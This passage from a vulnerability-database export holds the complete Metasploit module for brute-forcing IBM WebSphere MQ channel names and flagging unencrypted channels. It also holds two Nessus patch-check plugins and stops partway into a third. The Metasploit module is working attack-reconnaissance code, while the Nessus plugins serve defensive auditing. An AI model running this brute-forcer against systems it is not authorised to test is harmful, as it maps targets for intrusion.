"MSF:AUXILIARY/SCANNER/MISC/IBM_MQ_CHANNEL_BRUTE", "href": "", "type": "metasploit", "title": "IBM WebSphere MQ Channel Name Bruteforce", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'IBM WebSphere MQ Channel Name Bruteforce',\n 'Description' => 'This module uses a dictionary to bruteforce MQ channel names. For all identified channels it also returns if SSL is used and whether it is a server-connection channel.',\n 'Author' => 'Petros Koutroumpis',\n 'License' => MSF_LICENSE\n )\n register_options([\n Opt::RPORT(1414),\n OptInt.new('TIMEOUT', [true, \"The socket connect timeout in seconds\", 10]),\n OptInt.new('CONCURRENCY', [true, \"The number of concurrent channel names to check\", 10]),\n OptPath.new('CHANNELS_FILE',\n [ true, \"The file that contains a list of channel names\"]\n )])\n end\n\n def create_packet(chan)\n packet = \"\\x54\\x53\\x48\\x20\"+ \t# StructID\n \"\\x00\\x00\\x01\\x0c\"+ \t\t# MQSegmLen\n \"\\x02\" +\t\t\t \t# Byte Order\n \"\\x01\" +\t\t\t \t# SegmType\n \"\\x01\" +\t\t\t\t# CtlFlag1\n \"\\x00\" +\t\t\t\t# CtlFlag2\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"+\t# LUWIdent\n \"\\x22\\x02\\x00\\x00\"+\t\t\t# Encoding\n \"\\xb5\\x01\" +\t\t\t# CCSID\n \"\\x00\\x00\" +\t\t\t# Reserved\n \"\\x49\\x44\\x20\\x20\" +\t\t# StructID\n \"\\x0d\" +\t\t\t\t# FAP Level\n \"\\x26\" +\t\t\t\t# CapFlag1 - Channel Type\n \"\\x00\" +\t\t\t\t# ECapFlag1\n \"\\x00\" +\t\t\t\t# IniErrFlg1\n \"\\x00\\x00\" +\t\t\t# Reserved\n \"\\x32\\x00\" +\t\t\t# MaxMsgBtch\n \"\\xec\\x7f\\x00\\x00\" +\t\t# MaxTrSize\n \"\\x00\\x00\\x40\\x00\" +\t\t# MaxMsgSize\n \"\\xff\\xc9\\x9a\\x3b\" +\t\t# SegWrapVal\n + chan + \t\t\t\t# Channel name\n \"\\x20\" +\t\t\t\t# CapFlag2\n \"\\x20\" +\t\t\t\t# ECapFlag2\n \"\\x20\\x20\" +\t\t\t# ccsid\n \"QM1\" + \"\\x20\"*45 +\t\t\t# Queue Manager Name\n \"\\x20\\x20\\x20\\x20\" +\t\t# HBInterval\n \"\\x20\\x20\" +\t\t\t# EFLLength\n \"\\x20\" +\t\t\t\t# IniErrFlg2\n \"\\x20\" +\t\t\t\t# Reserved1\n \"\\x20\\x20\" +\t\t\t# HdrCprLst\n \"\\x20\\x20\\x20\\x20\\x2c\\x01\\x00\\x00\"+ # MSGCprLst1\n \"\\x8a\\x00\\x00\\x55\\x00\\xff\\x00\\xff\"+ # MsgCprLst2\n \"\\xff\\xff\" +\t\t\t# Reserved2\n \"\\xff\\xff\\xff\\xff\" +\t\t# SSLKeyRst\n \"\\xff\\xff\\xff\\xff\" +\t\t# ConvBySKt\n \"\\xff\" +\t\t\t\t# CapFlag3\n \"\\xff\" +\t\t\t\t# ECapFlag3\n \"\\xff\\xff\" +\t\t\t# Reserved3\n \"\\x00\\x00\\x00\\x00\" +\t\t# ProcessId\n \"\\x00\\x00\\x00\\x00\" +\t\t# ThreadId\n \"\\x00\\x00\\x05\\x00\" +\t\t# TraceId\n \"\\x00\\x00\\x10\\x13\\x00\\x00\" + \t# ProdId\n \"\\x01\\x00\\x00\\x00\\x01\\x00\" + \t# ProdId\n \"MQMID\" + \"\\x20\"*43 +\t\t# MQM Id\n \"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\"+ # Unknown\n \"\\x20\\x20\\x20\\x20\\x20\\x20\\x00\\x00\"+ # Unknown\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\"+ # Unknown\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\"+ # Unknown\n \"\\xff\\xff\\x00\\x00\\x00\\x00\\x00\\x00\"+ # Unknown\n \"\\x00\\x00\\x00\\x00\\x00\\x00\"\t\t# Unknown\n end\n\n\n def run_host(ip)\n @channels = []\n @unencrypted_mqi_channels = []\n begin\n channel_list\n rescue ::Rex::ConnectionRefused\n fail_with(Failure::Unreachable, \"TCP Port closed.\")\n rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error, Errno::ECONNRESET\n fail_with(Failure::Unreachable, \"Connection Failed.\")\n rescue ::Exception => e\n fail_with(Failure::Unknown, e)\n end\n if(@channels.empty?)\n print_status(\"#{ip}:#{rport} No channels found.\")\n else\n print_good(\"Channels found: #{@channels}\")\n print_good(\"Unencrypted MQI Channels found: #{@unencrypted_mqi_channels}\")\n report_note(\n :host => rhost,\n :port => rport,\n :type => 'mq.channels'\n )\n print_line\n end\n end\n\n def channel_list\n channel_data = get_channel_names\n while (channel_data.length > 0)\n t = []\n r = []\n begin\n 1.upto(datastore['CONCURRENCY']) do\n this_channel = channel_data.shift\n if this_channel.nil?\n next\n end\n t << framework.threads.spawn(\"Module(#{self.refname})-#{rhost}:#{rport}\", false, this_channel) do |channel|\n connect\n vprint_status \"#{rhost}:#{rport} - Sending request for #{channel}...\"\n if channel.length.to_i > 20\n print_error(\"Channel names cannot exceed 20 characters. Skipping.\")\n next\n end\n chan = channel + \"\\x20\"*(20-channel.length.to_i)\n timeout = datastore['TIMEOUT'].to_i\n s = connect(false,\n {\n 'RPORT' => rport,\n 'RHOST' => rhost,\n }\n )\n s.put(create_packet(chan))\n data = s.get_once(-1,timeout)\n if data.nil?\n print_status(\"No response received. Try increasing timeout.\")\n next\n end\n if not data[0...3].include? 'TSH'\n next\n end\n if data[-4..-1] == \"\\x01\\x00\\x00\\x00\" # NO_CHANNEL code\n next\n end\n if data[-4..-1] == \"\\x18\\x00\\x00\\x00\" # CIPHER_SPEC code\n print_status(\"Found channel: #{channel}, IsEncrypted: True, IsMQI: N/A\")\n elsif data[-4..-1] == \"\\x02\\x00\\x00\\x00\" # CHANNEL_WRONG_TYPE code\n print_status(\"Found channel: #{channel}, IsEncrypted: False, IsMQI: False\")\n else\n print_status(\"Found channel: #{channel}, IsEncrypted: False, IsMQI: True\")\n @unencrypted_mqi_channels << channel\n end\n @channels << channel\n disconnect\n end\n end\n t.each {|x| x.join }\n end\n end\n end\n\n def get_channel_names\n if(! @common)\n File.open(datastore['CHANNELS_FILE'], \"rb\") do |fd|\n data = fd.read(fd.stat.size)\n @common = data.split(/\\n/).compact.uniq\n end\n end\n @common\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/misc/ibm_mq_channel_brute.rb"}], "nessus": [{"lastseen": "2019-02-21T01:42:28", "bulletinFamily": "scanner", "description": "This update for Chromium to version 69.0.3497.92 fixes the following issues :\n\nSecurity issues fixed ((boo#1108114) :\n\n - Function signature mismatch in WebAssembly\n\n - URL Spoofing in Omnibox\n\nThe following tracked packaging issues were fixed :\n\n - the chromium package incorrectly provied swiftshader resolvables (boo#1108175)", "modified": "2018-09-17T00:00:00", "id": "OPENSUSE-2018-1005.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=117518", "published": "2018-09-17T00:00:00", "title": "openSUSE Security Update : chromium (openSUSE-2018-1005)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-1005.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117518);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/09/17 12:21:53\");\n\n script_name(english:\"openSUSE Security Update : chromium (openSUSE-2018-1005)\");\n script_summary(english:\"Check for the openSUSE-2018-1005 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for Chromium to version 69.0.3497.92 fixes the following\nissues :\n\nSecurity issues fixed ((boo#1108114) :\n\n - Function signature mismatch in WebAssembly\n\n - URL Spoofing in Omnibox\n\nThe following tracked packaging issues were fixed :\n\n - the chromium package incorrectly provied swiftshader\n resolvables (boo#1108175)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1108114\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1108175\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected chromium packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"Medium\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/09/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromedriver-69.0.3497.92-lp150.2.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromedriver-debuginfo-69.0.3497.92-lp150.2.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromium-69.0.3497.92-lp150.2.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromium-debuginfo-69.0.3497.92-lp150.2.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromium-debugsource-69.0.3497.92-lp150.2.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromedriver-69.0.3497.92-171.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromedriver-debuginfo-69.0.3497.92-171.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromium-69.0.3497.92-171.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromium-debuginfo-69.0.3497.92-171.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"chromium-debugsource-69.0.3497.92-171.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-02-21T01:42:20", "bulletinFamily": "scanner", "description": "An update is now available for Red Hat JBoss Core Services on RHEL 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Core Services is a set of supplementary software for Red Hat JBoss middleware products. This software, such as Apache HTTP Server, is common to multiple JBoss middleware products, and is packaged under Red Hat JBoss Core Services to allow for faster distribution of updates, and for a more consistent update experience.\n\nThis release of Red Hat JBoss Core Services Apache HTTP Server 2.4.23 Service Pack 1 serves as a replacement for Red Hat JBoss Core Services Apache HTTP Server 2.4.23, and includes bug fixes, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es) :\n\n* A memory leak flaw was found in the way OpenSSL handled TLS status request extension data during session renegotiation. A remote attacker could cause a TLS server using OpenSSL to consume an excessive amount of memory and, possibly, exit unexpectedly after exhausting all available memory, if it enabled OCSP stapling support. (CVE-2016-6304)\n\n* It was discovered that the mod_session_crypto module of httpd did not use any mechanisms to verify integrity of the encrypted session data stored in the user's browser. A remote attacker could use this flaw to decrypt and modify session data using a padding oracle attack.\n(CVE-2016-0736)\n\n* It was discovered that the mod_auth_digest module of httpd did not properly check for memory allocation failures. A remote attacker could use this flaw to cause httpd child processes to repeatedly crash if the server used HTTP digest authentication. (CVE-2016-2161)\n\n* A timing attack flaw was found in OpenSSL that could allow a malicious user with local access to recover ECDSA P-256 private keys.\n(CVE-2016-7056)\n\n* A denial of service flaw was found in the way the TLS/SSL protocol defined processing of ALERT packets during a connection handshake. A remote attacker could use this flaw to make a TLS/SSL server consume an excessive amount of CPU and fail to accept connections from other clients. (CVE-2016-8610)\n\n* It was discovered that the HTTP parser in httpd incorrectly allowed certain characters not permitted by the HTTP protocol specification to appear unencoded in HTTP request headers. If httpd was used in conjunction with a proxy or backend server that interpreted those characters differently, a remote attacker could possibly use this flaw to inject data into HTTP responses, resulting in proxy cache poisoning. (CVE-2016-8743)\n\n* A vulnerability was found in httpd's handling of the LimitRequestFields directive in mod_http2, affecting servers with HTTP/2 enabled. An attacker could send crafted requests with headers larger than the server's available memory, causing httpd to crash.\n(CVE-2016-8740)\n\nRed Hat would like to thank the OpenSSL project for reporting CVE-2016-6304 and Shi Lei (Gear Team of Qihoo 360 Inc.) for reporting CVE-2016-8610. Upstream acknowledges Shi Lei (Gear Team of Qihoo 360 Inc.) as the original reporter of CVE-2016-6304.", "modified": "2018-11-10T00:00:00", "id": "REDHAT-RHSA-2017-1413.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=117315", "published": "2018-09-06T00:00:00", "title": "RHEL 7 : JBoss Core Services (RHSA-2017:1413)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:1413. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117315);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2018/11/10 11:49:56\");\n\n script_cve_id(\"CVE-2016-0736\", \"CVE-2016-2161\", \"CVE-2016-6304\", \"CVE-2016-7056\", \"CVE-2016-8610\", \"CVE-2016-8740\", \"CVE-2016-8743\");\n script_xref(name:\"RHSA\", value:\"2017:1413\");\n\n script_name(english:\"RHEL 7 : JBoss Core Services (RHSA-2017:1413)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update is now available for Red Hat JBoss Core Services on RHEL 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Core Services is a set of supplementary software for Red\nHat JBoss middleware products. This software, such as Apache HTTP\nServer, is common to multiple JBoss middleware products, and is\npackaged under Red Hat JBoss Core Services to allow for faster\ndistribution of updates, and for a more consistent update experience.\n\nThis release of Red Hat JBoss Core Services Apache HTTP Server 2.4.23\nService Pack 1 serves as a replacement for Red Hat JBoss Core Services\nApache HTTP Server 2.4.23, and includes bug fixes, which are\ndocumented in the Release Notes document linked to in the References.\n\nSecurity Fix(es) :\n\n* A memory leak flaw was found in the way OpenSSL handled TLS status\nrequest extension data during session renegotiation. A remote attacker\ncould cause a TLS server using OpenSSL to consume an excessive amount\nof memory and, possibly, exit unexpectedly after exhausting all\navailable memory, if it enabled OCSP stapling support. (CVE-2016-6304)\n\n* It was discovered that the mod_session_crypto module of httpd did\nnot use any mechanisms to verify integrity of the encrypted session\ndata stored in the user's browser. A remote attacker could use this\nflaw to decrypt and modify session data using a padding oracle attack.\n(CVE-2016-0736)\n\n* It was discovered that the mod_auth_digest module of httpd did not\nproperly check for memory allocation failures. A remote attacker could\nuse this flaw to cause httpd child processes to repeatedly crash if\nthe server used HTTP digest authentication. (CVE-2016-2161)\n\n* A timing attack flaw was found in OpenSSL that could allow a\nmalicious user with local access to recover ECDSA P-256 private keys.\n(CVE-2016-7056)\n\n* A denial of service flaw was found in the way the TLS/SSL protocol\ndefined processing of ALERT packets during a connection handshake. A\nremote attacker could use this flaw to make a TLS/SSL server consume\nan excessive amount of CPU and fail to accept connections from other\nclients. (CVE-2016-8610)\n\n* It was discovered that the HTTP parser in httpd incorrectly allowed\ncertain characters not permitted by the HTTP protocol specification to\nappear unencoded in HTTP request headers. If httpd was used in\nconjunction with a proxy or backend server that interpreted those\ncharacters differently, a remote attacker could possibly use this flaw\nto inject data into HTTP responses, resulting in proxy cache\npoisoning. (CVE-2016-8743)\n\n* A vulnerability was found in httpd's handling of the\nLimitRequestFields directive in mod_http2, affecting servers with\nHTTP/2 enabled. An attacker could send crafted requests with headers\nlarger than the server's available memory, causing httpd to crash.\n(CVE-2016-8740)\n\nRed Hat would like to thank the OpenSSL project for reporting\nCVE-2016-6304 and Shi Lei (Gear Team of Qihoo 360 Inc.) for reporting\nCVE-2016-8610. Upstream acknowledges Shi Lei (Gear Team of Qihoo 360\nInc.) as the original reporter of CVE-2016-6304.\"\n );\n # https://access.redhat.com/documentation/en/red-hat-jboss-core-services/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?75d9eb14\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2017:1413\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-0736\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-2161\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-6304\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-7056\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-8610\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-8740\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-8743\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-httpd-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-httpd-selinux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-mod_ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-mod_proxy_html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-mod_security\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-mod_security-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-mod_session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-openssl-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:1413\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-httpd-2.4.23-120.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-httpd-debuginfo-2.4.23-120.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-httpd-devel-2.4.23-120.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-httpd-libs-2.4.23-120.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jbcs-httpd24-httpd-manual-2.4.23-120.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-httpd-selinux-2.4.23-120.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-httpd-tools-2.4.23-120.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-mod_ldap-2.4.23-120.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-mod_proxy_html-2.4.23-120.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-mod_security-2.9.1-19.GA.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-mod_security-debuginfo-2.9.1-19.GA.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-mod_session-2.4.23-120.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-mod_ssl-2.4.23-120.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-1.0.2h-13.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-debuginfo-1.0.2h-13.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-devel-1.0.2h-13.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-libs-1.0.2h-13.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-perl-1.0.2h-13.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-openssl-static-1.0.2h-13.jbcs.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jbcs-httpd24-httpd / jbcs-httpd24-httpd-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:33:30", "bulletinFamily": "scanner", "description": "According to its self-reported version number, the version of Oracle Integrated Lights Out Manager (ILOM) is affected by multiple vulnerabilities as described in the advisory.", "modified": "2018-07-16T00:00:00", "id": "ORACLE_ILOM_3_2_6.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=104047", "published": "2017-10-20T00:00:00", "title": "Oracle Integrated Lights Out Manager (ILOM) < 3.2.6 Multiple Vulnerabilities (uncredentialed check)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104047);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/07/16 14:09:12\");\n\n script_cve_id(\n \"CVE-2016-6304\",\n \"CVE-2016-7431\",\n \"CVE-2017-10099\",\n \"CVE-2017-10194\",\n \"CVE-2017-10260\",\n 